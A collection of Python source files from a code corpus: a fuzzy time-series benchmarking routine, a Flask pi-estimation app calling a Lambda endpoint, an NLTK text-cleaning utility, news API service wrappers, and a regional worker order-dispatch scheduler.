+ '\\\\\\\\ \\\\hline \\n'\n\n    return sup + header + body + '\\\\end{tabular}'\n\n\ndef simpleSearch_RMSE(train, test, model, partitions, orders, save=False, file=None, tam=[10, 15], plotforecasts=False, elev=30, azim=144, intervals=False, parameters=None, partitioner=Grid.GridPartitioner, transformation=None, indexer=None):\n    _3d = len(orders) > 1\n    ret = []\n    if _3d:\n        errors = np.array([[0.0 for k in range(len(partitions))] for kk in range(len(orders))])\n    else:\n        errors = []\n    forecasted_best = []\n    fig = plt.figure(figsize=tam)\n    if plotforecasts:\n        ax0 = fig.add_axes([0, 0.4, 0.9, 0.5])\n        ax0.set_xlim([0, len(train)])\n        ax0.set_ylim([min(train) * 0.9, max(train) * 1.1])\n        ax0.set_title('Forecasts')\n        ax0.set_ylabel('F(T)')\n        ax0.set_xlabel('T')\n    min_rmse = 1000000.0\n    best = None\n    for pc, p in enumerate(partitions, start=0):\n        sets = 
partitioner(data=train, npart=p, transformation=transformation).sets\n        for oc, o in enumerate(orders, start=0):\n            fts = model('q = ' + str(p) + ' n = ' + str(o))\n            fts.append_transformation(transformation)\n            fts.train(train, sets=sets, order=o, parameters=parameters)\n            if not intervals:\n                forecasted = fts.forecast(test)\n                if not fts.has_seasonality:\n                    error = Measures.rmse(np.array(test[o:]), np.array(forecasted[:-1]))\n                else:\n                    error = Measures.rmse(np.array(test[o:]), np.array(forecasted))\n                for kk in range(o):\n                    forecasted.insert(0, None)\n\n                if plotforecasts:\n                    ax0.plot(forecasted, label=(fts.name))\n            else:\n                forecasted = fts.forecast_interval(test)\n                error = 1.0 - Measures.rmse_interval(np.array(test[o:]), np.array(forecasted[:-1]))\n            if _3d:\n                errors[(oc, pc)] = error\n            else:\n                errors.append(error)\n            if error < min_rmse:\n                min_rmse = error\n                best = fts\n                forecasted_best = forecasted\n\n    if plotforecasts:\n        ax0.plot(test, label='Original', linewidth=3.0, color='black')\n    if _3d:\n        ax1 = Axes3D(fig, rect=[0, 1, 0.9, 0.9], elev=elev, azim=azim)\n        ax1.set_title('Error Surface')\n        ax1.set_ylabel('Model order')\n        ax1.set_xlabel('Number of partitions')\n        ax1.set_zlabel('RMSE')\n        X, Y = np.meshgrid(partitions, orders)\n        surf = ax1.plot_surface(X, Y, errors, rstride=1, cstride=1, antialiased=True)\n    else:\n        ax1 = fig.add_axes([0, 1, 0.9, 0.9])\n        ax1.set_title('Error Curve')\n        ax1.set_xlabel('Number of partitions')\n        ax1.set_ylabel('RMSE')\n        ax1.plot(partitions, errors)\n    ret.append(best)\n    ret.append(forecasted_best)\n    ret.append(min_rmse)\n    cUtil.show_and_save_image(fig, file, save)\n    return ret\n
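\n# Usage sketch (hypothetical data; the function returns the list\n# [best_model, best_forecasts, best_rmse] built just above):\n# best, forecasts, rmse = simpleSearch_RMSE(train, test, hofts.HighOrderFTS,\n#     range(10, 50, 10), [1, 2], plotforecasts=False)\n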
\n\ndef pftsExploreOrderAndPartitions(data, save=False, file=None):\n    fig, axes = plt.subplots(nrows=4, ncols=1, figsize=[6, 8])\n    data_fs1 = Grid.GridPartitioner(data=data, npart=10)\n    mi = []\n    ma = []\n    axes[0].set_title('Point Forecasts by Order')\n    axes[2].set_title('Interval Forecasts by Order')\n    for order in np.arange(1, 6):\n        fts = pwfts.ProbabilisticWeightedFTS('')\n        fts.shortname = 'n = ' + str(order)\n        fts.train(data, sets=(data_fs1.sets), order=order)\n        point_forecasts = fts.forecast(data)\n        interval_forecasts = fts.forecast_interval(data)\n        lower = [kk[0] for kk in interval_forecasts]\n        upper = [kk[1] for kk in interval_forecasts]\n        mi.append(min(lower) * 0.95)\n        ma.append(max(upper) * 1.05)\n        for k in np.arange(0, order):\n            point_forecasts.insert(0, None)\n            lower.insert(0, None)\n            upper.insert(0, None)\n\n        axes[0].plot(point_forecasts, label=(fts.shortname))\n        axes[2].plot(lower, label=(fts.shortname))\n        axes[2].plot(upper)\n\n    axes[1].set_title('Point Forecasts by Number of Partitions')\n    axes[3].set_title('Interval Forecasts by Number of Partitions')\n    for partitions in np.arange(5, 11):\n        data_fs = Grid.GridPartitioner(data=data, npart=partitions)\n        fts = pwfts.ProbabilisticWeightedFTS('')\n        fts.shortname = 'q = ' + str(partitions)\n        fts.train(data, sets=(data_fs.sets), order=1)\n        point_forecasts = fts.forecast(data)\n        interval_forecasts = fts.forecast_interval(data)\n        lower = [kk[0] for kk in interval_forecasts]\n        upper = [kk[1] for kk in interval_forecasts]\n        mi.append(min(lower) * 0.95)\n        ma.append(max(upper) * 1.05)\n        point_forecasts.insert(0, None)\n        lower.insert(0, None)\n        upper.insert(0, None)\n        axes[1].plot(point_forecasts, label=(fts.shortname))\n        axes[3].plot(lower, label=(fts.shortname))\n        axes[3].plot(upper)\n\n    for ax in axes:\n        ax.set_ylabel('F(T)')\n        ax.set_xlabel('T')\n        ax.plot(data, label='Original', color='black', linewidth=1.5)\n        handles, labels = ax.get_legend_handles_labels()\n        ax.legend(handles, labels, loc=2, bbox_to_anchor=(1, 1))\n        ax.set_ylim([min(mi), max(ma)])\n        ax.set_xlim([0, len(data)])\n\n    plt.tight_layout()\n    cUtil.show_and_save_image(fig, file, save)","sub_path":"pycfiles/pyfttt-0.3.2-py2.py3-none-any/benchmarks.cpython-36.py","file_name":"benchmarks.cpython-36.py","file_ext":"py","file_size_in_byte":40600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"495333967","text":"from flask import Flask, flash, redirect, render_template,request, url_for\nimport math\nimport base64\nimport concurrent.futures\nimport itertools\nimport http.client\nimport time\nfrom multiprocessing.pool import ThreadPool\nfrom threading import Thread\nimport ast\nimport pandas as pd\nimport random\nimport os\nimport io\nimport boto3\nfrom io import StringIO\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\n\ndef estimate_pi(args,result,index):\n    shots = args[0]\n    reporting_rate = args[1]\n    process_id = args[2]\n    c = http.client.HTTPSConnection(\"eqfupdwvib.execute-api.eu-west-2.amazonaws.com\")\n    payload = '{\"shots\":\"'+str(shots)+'\",\"reporting_rate\":\"'+str(reporting_rate)+'\",\"process_id\":'+str(process_id)+'}'\n    \n    c.request(\"POST\", \"/default/pi_estimation\", payload)\n    \n    response = c.getresponse()\n    data = ast.literal_eval(response.read().decode(\"utf-8\").strip('\"'))\n    result[index] = data\n
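\n# The Lambda endpoint above is assumed to answer with a JSON-quoted Python\n# literal, e.g. '[[0, 786, 1000, 1000], [0, 1571, 2000, 2000]]' -- one\n# [process, incircle, shots, iterating_shots_val] entry per reporting step\n# (hypothetical values), which ast.literal_eval() turns back into a list.\n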
\n\n\n@app.route('/get_user_data', methods=['POST','GET'])\ndef userpath():\n\n    # number of shots\n    shots = int(request.form[\"shots\"])\n    if shots%1000 != 0:\n        flash('Error')\n        return redirect(url_for('index'))\n\n    \n    service = request.form[\"service\"] \n\n    # reporting rate\n    reporting_rate = int(request.form[\"reporting_rate\"])\n    if reporting_rate > shots:\n        flash('Reporting rate should be less than shots')\n        return redirect(url_for('index')) \n\n    # resources\n    resources_count = int(request.form[\"resources\"] )\n    if resources_count > shots:\n        flash('resources should be less than shots')\n        return redirect(url_for('index')) \n\n    # resource functionality\n    ten_percent = int(0.1 * (shots/resources_count))\n    result_1= [int(shots/resources_count)] * resources_count\n    result_1[0] = result_1[0] + max(reporting_rate, ten_percent)\n    result_1[-1] = result_1[-1] - max(reporting_rate, ten_percent)\n\n\n    counter = itertools.count(0)\n    processes = [[shots,reporting_rate,next(counter)] for shots in result_1]\n\n    if service == 'Lambda':\n        start = time.time()\n\n        pool = ThreadPool(processes=len(processes))\n\n\n        threads = [None] * len(processes)\n        results = [None] * len(processes)\n\n        for i in range(len(threads)):\n            threads[i] = Thread(target=estimate_pi, args=(processes[i], results, i))\n            threads[i].start()\n\n        # do some other stuff\n\n        for i in range(len(threads)):\n            threads[i].join()\n\n        time_taken = time.time() - start\n\n        total_list = [a for b in results for a in b]\n\n        triplets_table = pd.DataFrame(total_list,columns = [\"process\",\"incircle\",\"shots\",\"iterating_shots_val\"])\n\n        distinct_processes = list(triplets_table['process'].unique())\n\n        #print(distinct_processes)\n        estimates = []\n        for k in range(0,len(distinct_processes)):\n            \n            if distinct_processes[k] == distinct_processes[0]:\n                base_shots = 0\n                base_incircle = 0\n            else:\n                base_df = triplets_table[triplets_table['process'] == distinct_processes[k-1]].reset_index(drop=True)\n                base_shots = base_df['shots'][len(base_df)-1]\n                base_incircle = base_df['incircle'][len(base_df)-1] \n            \n            current_process_results = triplets_table[triplets_table['process'] == distinct_processes[k]].reset_index(drop=True)\n\n            for q in range(0,len(current_process_results)):\n                estimates.append(4*(base_incircle+current_process_results['incircle'][q])/(base_shots+current_process_results['iterating_shots_val'][q]))\n\n\n        # image charts\n        final_pi_val = estimates[-1]\n        pi_estimates_str = [str(z) for z in estimates]\n        pi_estimates_str = \",\".join(pi_estimates_str)\n        \n        const_line = \",\".join([str(math.pi) for o in range(0,len(estimates))])\n\n        \n\n        return render_template('chart.htm',tables=[triplets_table.to_html(classes='data')], piestimates =pi_estimates_str ,piline =const_line, titles=triplets_table.columns.values,text = \"Estimated value of pi is \"+str(final_pi_val))\n\n\n@app.route('/', methods=['GET','POST'])\ndef index():\n\n    return render_template('index.htm')\n\n\nif __name__ == \"__main__\":\n    #run_server()\n    app.run(threaded=True,debug=True)\n","sub_path":"Cloud_LSA/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"585812044","text":"import re\n\nfrom bs4 import BeautifulSoup\nfrom nltk.corpus import stopwords\n\n\nclass Utility(object):\n    \"\"\"Utility is a class for processing raw HTML text into segments for further learning\"\"\"\n\n    @staticmethod\n    def review_to_wordlist( review, remove_stopwords=False, remove_numbers=True):\n        # Function to convert a document to a sequence of words,\n        # optionally removing stop words. Returns a list of words.\n        #\n        # 1. Remove HTML\n        review_text = BeautifulSoup(review, 'html.parser').get_text()\n        #\n        # 2. Remove non-letters and non-numbers\n        review_text = re.sub(\"[^a-zA-Z0-9]\", \" \", review_text)\n        #\n        # 2.5 Optionally remove numbers\n        if remove_numbers:\n            review_text = re.sub(\"[0-9]\", \" \", review_text)\n        else:\n            review_text = review_text.replace('0', ' zero ')\n            review_text = review_text.replace('1', ' one ')\n            review_text = review_text.replace('2', ' two ')\n            review_text = review_text.replace('3', ' three ')\n            review_text = review_text.replace('4', ' four ')\n            review_text = review_text.replace('5', ' five ')\n            review_text = review_text.replace('6', ' six ')\n            review_text = review_text.replace('7', ' seven ')\n            review_text = review_text.replace('8', ' eight ')\n            review_text = review_text.replace('9', ' nine ')\n        #\n        # 3. Convert words to lower case and split them\n        words = review_text.lower().split()\n        #\n        # 4. Optionally remove stop words (false by default)\n        if remove_stopwords:\n            stops = set(stopwords.words(\"english\"))\n            words = [w for w in words if w not in stops]\n        #\n        # 5. Return a list of words\n        return words\n\n    # Define a function to split a review into parsed sentences\n    @staticmethod\n    def review_to_sentences( review, tokenizer, remove_stopwords=False, remove_numbers=True):\n        # Function to split a review into parsed sentences. Returns a\n        # list of sentences, where each sentence is a list of words\n        #\n        # 1. Use the NLTK tokenizer to split the paragraph into sentences\n        if isinstance(review, bytes):\n            review = review.decode('utf8')\n        raw_sentences = tokenizer.tokenize(review.strip())\n        #\n        # 2. 
Loop over each sentence\n        sentences = []\n        for raw_sentence in raw_sentences:\n            # If a sentence is empty, skip it\n            if len(raw_sentence) > 0:\n                # Otherwise, call review_to_wordlist to get a list of words\n                sentences.append(Utility.review_to_wordlist(raw_sentence, \\\n                    remove_stopwords, remove_numbers))\n        #\n        # Return the list of sentences (each sentence is a list of words,\n        # so this returns a list of lists)\n        return sentences
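\n# Example wiring (hypothetical review text): the tokenizer argument is an NLTK\n# sentence tokenizer, e.g.:\n# import nltk.data\n# tokenizer = nltk.data.load('tokenizers/punkt/english.pickle')\n# sentences = Utility.review_to_sentences(raw_review, tokenizer, remove_stopwords=True)\n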
","sub_path":"research/Utility.py","file_name":"Utility.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"207588432","text":"import requests\nimport json\nimport yaml\nimport os\n\nfrom newsapi import NewsApiClient\nfrom flask import Flask, make_response, jsonify\n\nfrom parlai.agents.programr.utils.logging.ylogger import YLogger\nfrom parlai.agents.programr.services.service import Service\n\n\nclass NewsAPI(object):\n    # NOTE: website of the news api\n    # https://newsapi.org\n\n    def __init__(self, api_key):\n        self.api_key = api_key\n\n    # NOTE: sources is a str to identify what news source to pull from\n    # ex: 'bbc-news'\n    # You can find a list of acceptable country codes here:\n    # https://github.com/mattlisiv/newsapi-python/blob/master/newsapi/const.py\n    def headlines(self, sources=None, country=None):\n        return NewsApiClient(self.api_key).get_top_headlines(sources=sources, country=country)\n\n\nclass NewsService(Service):\n    def __init__(self, config=None):\n        Service.__init__(self, config)\n        self._current_article = 0\n        self.api_key = config.api_key\n        self.api = NewsAPI(self.api_key)\n\n    def get_content_info(self, top_headlines):\n        content = top_headlines['articles'][self._current_article]['content']\n        return content\n\n    def get_title_info(self, top_headlines):\n        title = top_headlines['articles'][self._current_article]['title']\n        return title\n\n    def get_description_info(self, top_headlines):\n        description = top_headlines['articles'][self._current_article]['description']\n        return description\n\n    def clean_text(self, text):\n        text = text.replace(\"Image copyrightReutersImage caption\", \"\")\n        text = text.replace(\"\\n\", \" \")\n        text.encode(\"ascii\", errors=\"ignore\")\n        # summary = re.sub('\\[.*\\]', '', summary)\n        return text\n\n    def format_response(self, top_headlines):\n        description = self.get_description_info(top_headlines)\n        title = self.get_title_info(top_headlines)\n\n        search = f\"The title of the article is {title}, here is a quick summary...{description} .\"\n        search += \" Should I read the full article?\"\n        return search\n\n    def ask_question(self, question: str):\n        try:\n            words = question.split()\n            question = \" \".join(words[1:])\n            if words[0] == 'HEADLINES':\n                search = self.api.headlines(sources='bbc-news')\n                search = search['articles'][self._current_article]['title']\n\n            elif words[0] == 'NEXT':\n                self._current_article += 1\n                search = self.api.headlines(sources='bbc-news')\n                search = search['articles'][self._current_article]['title']\n\n            elif words[0] == 'PREVIOUS':\n                self._current_article -= 1\n                search = self.api.headlines(sources='bbc-news')\n                search = search['articles'][self._current_article]['title']\n\n            else:\n                YLogger.error(self, \"Unknown News API command [%s]\", words[0])\n                search = \"\"\n\n            return search\n        except Exception as ex:\n            YLogger.error(self, \"General error querying News API for question [%s]\", question)\n            YLogger.error(self, f\"Exception message: {ex}\")\n            return \"\"\n\nclass BingAPI(object):\n    def __init__(self, url, headers, params=None):\n        self.url = url\n        self.headers = headers\n        self.params = params\n        self._current_article = 0\n\n    def bing_headlines(self):\n        try:\n            response = requests.request(\"GET\", url=self.url, headers=self.headers, params=self.params)\n            headline_dict = response.json()\n            headline = headline_dict['value'][self._current_article]['name']\n            return headline\n        except Exception as ex:\n            print(\"error getting request. {}\".format(ex))\n            return \"\"\n\n\nclass BingNewsService(Service):\n    def __init__(self, config=None):\n        Service.__init__(self, config)\n        self._current_article = 0\n        self._url = os.getenv(\"NEWS_URL\")\n        self._headers = {\n            \"x-rapidapi-host\": os.getenv(\"NEWS_HEADERS_HOST\"),\n            \"x-rapidapi-key\": os.getenv(\"NEWS_HEADERS_KEY\")\n        }\n        self.api = BingAPI(self._url, self._headers)\n\n    def init_api(self, url, headers):\n        self._url = url\n        self._headers = headers\n        self.api = BingAPI(self._url, self._headers)\n\n    def get_content_info(self, top_headlines):\n        content = top_headlines['articles'][self._current_article]['content']\n        return content\n\n    def get_title_info(self, top_headlines):\n        title = top_headlines['articles'][self._current_article]['title']\n        return title\n\n    def get_description_info(self, top_headlines):\n        description = top_headlines['articles'][self._current_article]['description']\n        return description\n\n    def clean_text(self, text):\n        text = text.replace(\"Image copyrightReutersImage caption\", \"\")\n        text = text.replace(\"\\n\", \" \")\n        text.encode(\"ascii\", errors=\"ignore\")\n        # summary = re.sub('\\[.*\\]', '', summary)\n        return text\n\n    def format_response(self, top_headlines):\n        description = self.get_description_info(top_headlines)\n        title = self.get_title_info(top_headlines)\n\n        search = f\"The title of the article is {title}, here is a quick summary...{description} .\"\n        search += \" Should I read the full article?\"\n        return search\n\n    def ask_question(self, question: str):\n        try:\n            words = question.split()\n            question = \" \".join(words[1:])\n            if words[0] == 'HEADLINES':\n                search = self.api.bing_headlines()\n            elif words[0] == 'NEXT':\n                self.api._current_article += 1\n                search = self.api.bing_headlines()\n            elif words[0] == 'PREVIOUS':\n                self.api._current_article -= 1\n                search = self.api.bing_headlines()\n            else:\n                YLogger.error(self, \"Unknown News API command [%s]\", words[0])\n                search = \"\"\n            return search\n        except Exception as ex:\n            YLogger.error(self, \"General error querying News API for question [%s]\", question)\n            YLogger.error(self, \"Exception message: [%s]\", ex)\n            return \"\"\n\n\nif __name__ == \"__main__\":\n    print(\"Testing news service.\")\n\n    c = BingNewsService()\n\n    # params = {\"Category\":\"sports\"}\n\n    url = os.getenv(\"NEWS_URL\")\n    headers = {\n        'x-rapidapi-host': os.getenv(\"NEWS_HEADERS_HOST\"),\n        'x-rapidapi-key': os.getenv(\"NEWS_HEADERS_KEY\")\n    }\n\n    c.init_api(url, headers)\n\n    headline = c.ask_question(\"HEADLINES\")\n    print(headline)\n\n    headline = c.ask_question(\"NEXT\")\n    print(headline)\n    #\n    # headline = c.ask_news(\"NEXT us\")\n    # print(headline)\n    #\n    # headline = c.ask_news(\"PREVIOUS us\")\n    # print(headline)\n","sub_path":"parlai/agents/programr/services/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"541167425","text":"# -*- coding: utf-8 -*-\n'''\n    Create the data for simulated order dispatching\n'''\nimport math\nimport datetime as dt\nimport time\nimport random\nimport json\nimport numpy as np\nimport pandas as pd\n\nfrom api.models.models import *\nimport api.common_func.area as my_area\nfrom .sch_api import *\n# from .to_task import *\nfrom api.common_func.cluster_address import cluster\n\n\ndef random_period(day_str):\n    t = dt.datetime.strptime(day_str + ' 6:00', \"%Y-%m-%d %H:%M\")\n    p = random.randint(0, 14)\n    t1 = dt.timedelta(seconds=3600 * p)\n    start = t + t1\n    if p < 14:\n        p2 = random.randint(2, 16 - p)\n    else:\n        p2 = 2\n    end = start + dt.timedelta(seconds=3600 * p2)\n    return start, end\n
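\n# For example (hypothetical draw): random_period('2020-01-01') may return\n# (datetime(2020, 1, 1, 9, 0), datetime(2020, 1, 1, 14, 0)) -- a start between\n# 06:00 and 20:00 plus a 2..16 hour window that never runs past 22:00.\n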
.to_task import *\nfrom api.common_func.cluster_address import cluster\n\n\ndef random_period(day_str):\n t = datetime.strptime(day_str + ' 6:00', \"%Y-%m-%d %H:%M\")\n p = random.randint(0, 14)\n t1 = dt.timedelta(seconds=3600 * p)\n start = t + t1\n if p < 14:\n p2 = random.randint(2, 16 - p)\n else:\n p2 = 2\n end = start + dt.timedelta(seconds=3600 * p2)\n return start, end\n\n\ndef gen_client_orders(regions, workday, n_order, n_address):\n '''\n gen orders to simulate\n\n output:\n order array:\n job_type: 2: 20min, 3:30min, 4:40min\n '''\n\n orders = []\n for x in range(n_order - 1):\n start_time, end_time = random_period(workday)\n job_type = random.randint(2, 4)\n hrs = (job_type * 600) / 3600\n addr = random.randint(1, n_address)\n if len(regions) < 2:\n region_id = regions[0]\n else:\n region_id = regions[random.randint(0, len(regions) - 1)]\n sim_addr = my_area.gen_loc(region_id)\n address = sim_addr[1]\n lat, lon = sim_addr[0].split(',')\n orders.append({\n 'city': u\"上海市\",\n 'region_id': region_id,\n 'order_id': random.randint(10000, 20000),\n 'address': address,\n 'addr': '',\n 'start_time': start_time,\n 'end_time': end_time,\n 'job_type': job_type,\n 'hrs': hrs,\n 'addr_lat': lat,\n 'addr_lon': lon\n })\n jobs = pd.DataFrame([x for x in orders])\n return jobs\n\n\ndef gen_worker(regions, day_str, n_worker):\n '''\n worker_type: \n 1: 全职 \n 2: 兼职 \n 3: 特服\n\n min_hrs : bdt 应派工时\n mdt_hrs: 技师名下订单工时\n '''\n workers = []\n for w in range(n_worker):\n tp = random.randint(1, 20)\n w_rank = random.randint(100, 500)\n if len(regions) < 2:\n region_id = regions[0]\n else:\n region_id = regions[random.randint(0, len(regions) - 1)]\n if tp % 4 == 1:\n worker_type = 3\n w_type = u'兼职'\n s1 = random.randint(0, 8)\n w_start = dt.datetime.strptime(\n day_str + ' 6:00', \"%Y-%m-%d %H:%M\") + dt.timedelta(seconds=3600*s1)\n w_end = w_start + dt.timedelta(seconds=3600*4)\n w_hrs = 4\n max_star_t = random.randint(2, 4)\n mdt = random.randint(0, 8)\n elif tp % 5 == 0:\n worker_type = 3\n w_type = u'特服'\n w_start = dt.datetime.strptime(day_str + ' 6:00', \"%Y-%m-%d %H:%M\")\n w_end = w_start + dt.timedelta(seconds=3600*1*8)\n w_hrs = 8\n max_star_t = 8\n mdt = 0\n w_rank = 0\n else:\n s1 = random.randint(0, 8)\n worker_type = 1\n w_type = u'全职'\n w_start = dt.datetime.strptime(\n day_str + ' 6:00', \"%Y-%m-%d %H:%M\") + dt.timedelta(seconds=3600*s1)\n w_end = w_start + dt.timedelta(seconds=3600*1*8)\n w_hrs = 8\n max_star_t = random.randint(4, 8)\n mdt = random.randint(0, 12)\n\n workers.append({\n 'city': u\"上海市\",\n 'worker_id': w + 1,\n 'w_start': w_start, # : 工作开始时间\n 'w_end': w_end, # :工作结束时间\n 'worker_type': worker_type,\n # 'w_type': w_type,\n 'w_hrs': w_hrs, # 可用工时\n 'w_region': region_id, # 开工地点(区域id)\n 'w_rank': w_rank, # 星级\n 'max_star_t': max_star_t, # 按星级最大派单工时\n 'mdt': mdt, # 技师名下订单\n 'hrs_to_assign': 0,\n 'hrs_assigned': 0,\n 'adt_hrs': 0\n })\n workers = pd.DataFrame([wr for wr in workers]).sort_values(\n ['worker_type', 'w_start', 'w_region'])\n #: 确定最小派单工时\n workers.loc[:, 'min_hrs'] = np.where(\n workers.max_star_t < workers.w_hrs, workers.max_star_t, workers.w_hrs)\n workers.loc[:, 'bdt_hrs'] = np.where(\n workers.mdt < workers.min_hrs, workers.mdt, workers.min_hrs)\n workers = workers.sort_values(\n ['worker_type', 'hrs_to_assign', 'w_rank'], ascending=[1, 0, 0])\n return workers\n\n\ndef start_multi_region_sch(city, sch_date_str):\n \"\"\"\n multi region sch main\n \"\"\"\n #: create SchTask\n task_name = 'schedule of ' + dt.datetime.today().date().isoformat()\n # st = 
SchTask(city)\n\n # sch_task_id = st.create(sch_date_str, task_name)\n\n sch_dt = dt.datetime.strptime(sch_date_str, \"%Y-%m-%d\")\n new_task = SchTaskM(city=city, sch_date=sch_date_str,\n name=task_name, status='started')\n db.session.add(new_task)\n db.session.flush()\n sch_task_id = new_task.id\n #: mark job data, count region\n sh = SchJobs(city)\n region_counts = sh.mark_unsch_jobs(sch_dt, sch_task_id)\n\n #: create subtask by region\n if region_counts is None:\n return dict(message='no open jobs')\n\n for r in region_counts:\n region_id = r['region_id']\n region_jobs_count = r['region_jobs']\n sub_task_uid = str(sch_task_id) + '-' + region_id\n\n # issue region sch 使用 celery task\n # from api.new_task import region_job_sch\n # celery_task = region_job_sch.delay(sch_task_id, region_id, sch_date_str)\n # sub_task_uid = celery_task.id\n\n #: create sub_task records\n st = SubTaskM(\n city=city,\n sch_task_id=sch_task_id,\n sub_task_uid=sub_task_uid,\n sch_date=sch_dt,\n status='started',\n region_id=region_id,\n job_num=region_jobs_count\n )\n db.session.add(st)\n db.session.flush()\n\n #: 按 region 派单 不使用 celery\n sch_tomorrow_by_region(sch_task_id, region_id,\n sub_task_uid, sch_date_str, city=\"上海市\")\n\n db.session.commit()\n return\n\n\ndef update_celety_status(celery_uid, data):\n \"\"\"\n update celery task result\n \"\"\"\n sub_task = SubTaskM.find(sub_task_uid=celery_uid)\n if sub_task.one_or_none():\n sub_task.update(data)\n db.session.commit()\n return row2dict(sub_task.one())\n else:\n return\n\n\ndef check_task_status(sch_task_id):\n \"\"\"\n check task 's all sub, decide next step\n \"\"\"\n sub_tasks = SubTaskM.find(sch_task_id=sch_task_id, status='started').all()\n if len(sub_tasks) == 0:\n sch_task = SchTaskM.find(id=sch_task_id).one_or_none()\n if sch_task:\n sch_task.update(dict(status='stage2'))\n schedule_step2(sch_task_id)\n db.session.commit()\n\n\ndef sch_tomorrow_by_region(task_id, region_id, celery_uid, sch_date_str, city=\"上海市\"):\n \"\"\"\n step1: 按region 派单\n \"\"\"\n # 获取数据,region Jobs\n sch_job = SchJobs(city)\n region_jobs = sch_job.get_open_job_by_task_region(task_id, region_id)\n\n if region_jobs is None:\n data = dict(job_num=0, status='done', sub_task_message='no open jobs')\n update_celety_status(celery_uid, data)\n check_task_status(task_id)\n return dict(status='error', msg='no jobs', data='')\n\n job_num = len(region_jobs)\n df_addr = region_jobs.groupby('address').agg(\n {\"addr_lat\": 'last', 'addr_lon': 'last'})\n X = np.array(df_addr)\n #: Cluster Addr\n addr_labels, lat_label = cluster(X)\n # addr_labels = cluster_addr(X)\n df_addr.loc[:, 'addr'] = addr_labels\n region_jobs = pd.merge(region_jobs, df_addr, how='left', left_on='address',\n left_index=False, right_index=True, sort=True,\n suffixes=('', '_y'), copy=True, indicator=False,\n validate=None)\n region_jobs.loc[:, 'addr'] = region_jobs.addr_y\n region_jobs = region_jobs.loc[:,\n (u'addr', u'end_time', u'hrs', u'job_type', u'order_id', u'region_id', 'hrs_t',\n u'sch_task_id', 'status', u'city', 'sch_date', u'start_time', u'worker_id', u'addr_lat', u'addr_lon')]\n sch_workers = SchWorkers(city)\n region_wkrs = sch_workers.all_worker_by_date(sch_date_str, region_id)\n if region_wkrs is None:\n data = dict(job_num=job_num, status='done',\n sub_task_message='no free worker')\n update_celety_status(celery_uid, data)\n check_task_status(task_id)\n return dict(status='error', msg='no workers', data='')\n\n # return \"Done\"\n assigned_jobs, open_jobs, worker_summary, arranged_workers = 
dispatch_region_jobs(\n region_jobs, region_wkrs, sch_date_str)\n\n # update assigned_jobs to database\n if not assigned_jobs.empty:\n save_assign_jobs_db(assigned_jobs)\n\n if not open_jobs.empty:\n # open_jobs_dict = open_jobs.drop(['hrs_t'], 1).to_dict('records')\n open_job_num = len(open_jobs)\n else:\n open_job_num = 0\n data = dict(job_num=job_num, open_job_num=open_job_num,\n status='done', sub_task_message='step 1 done')\n update_celety_status(celery_uid, data)\n return\n\n\ndef schedule_step2(sch_task_id, city=\"上海市\"):\n \"\"\"\n activated by last region schedule task\n \"\"\"\n sch_job = SchJobs(city)\n sch_workers = SchWorkers(city)\n\n open_jobs = sch_job.get_open_job_by_task_region(sch_task_id)\n if open_jobs is None:\n return\n sch_date_str = open_jobs.iloc[0].sch_date\n\n if len(open_jobs):\n #: sort by region\n open_by_region = open_jobs.groupby('region_id').agg({\n 'order_id': 'count',\n 'start_time': np.min,\n 'end_time': np.max,\n 'hrs': 'sum'\n }).sort_values(['hrs'], ascending=[0])\n\n #: iter by region\n #: find near area\n for idx, row in open_by_region.iterrows():\n nearby_list = near_area_data(idx)\n #: get region_jobs open\n region_jobs = open_jobs.loc[open_jobs.region_id == idx]\n\n #: get nearby worker\n for n in nearby_list:\n near_region_id = n['area_id']\n ridding_time = n['ridding_time']\n region_wkrs = sch_workers.all_worker_by_date(\n sch_date_str, near_region_id)\n if region_wkrs is not None:\n assigned_jobs, open_jobs, worker_summary, arranged_workers = dispatch_region_jobs(\n region_jobs, region_wkrs, sch_date_str)\n if assigned_jobs is not None:\n save_assign_jobs_db(assigned_jobs)\n\n return sch_task_id\n\n\ndef save_assign_jobs_db(assigned_jobs):\n \"\"\"\n save assigned_jobs dataframe to db\n \"\"\"\n if 'grp' in assigned_jobs:\n assigned_jobs = assigned_jobs.drop(\n ['grp', 'hrs_t', 'trans_hr', 'wait_hr'], 1)\n assigned_jobs.start_time = assigned_jobs.start_time.apply(\n lambda x: x.strftime('%Y-%m-%d %H:%M'))\n assigned_jobs.end_time = assigned_jobs.end_time.apply(\n lambda x: x.strftime('%Y-%m-%d %H:%M'))\n assigned_jobs.plan_end = assigned_jobs.plan_end.apply(\n lambda x: x.strftime('%Y-%m-%d %H:%M'))\n assigned_jobs.plan_start = assigned_jobs.plan_start.apply(\n lambda x: x.strftime('%Y-%m-%d %H:%M'))\n assigned_jobs.status = 'assigned'\n\n to_update = assigned_jobs.to_dict('records')\n for x in to_update:\n SchJobsM.query.filter(SchJobsM.order_id == x['order_id']).update(x)\n db.session.flush()\n try:\n db.session.commit()\n except:\n db.session.rollback()\n return 'ok'\n\n\ndef near_area_data(region_id):\n \"\"\"\n return:\n [\n {'area_id': 439, 'ridding_time': 1349}, \n {'area_id': 441, 'ridding_time': 1544}, \n {'area_id': 410, 'ridding_time': 1594}, \n {'area_id': 470, 'ridding_time': 1618}, \n {'area_id': 411, 'ridding_time': 2089}, \n {'area_id': 471, 'ridding_time': 2112}, \n {'area_id': 409, 'ridding_time': 2281}, \n {'area_id': 469, 'ridding_time': 3229}\n ]\n \"\"\"\n n_area = my_area.NearbyM()\n\n _nears = n_area.get_nearby(region_id)['nearby']\n nearby_list = []\n for (k, v) in _nears.items():\n if bool(v):\n nearby_list.append(\n dict(area_id=v['area_id'], ridding_time=v['ridding_time']))\n print(nearby_list)\n nearby_list = sorted(nearby_list, key=lambda x: x['ridding_time'])\n return nearby_list\n","sub_path":"api/modules/scheduler/sch_sim.py","file_name":"sch_sim.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
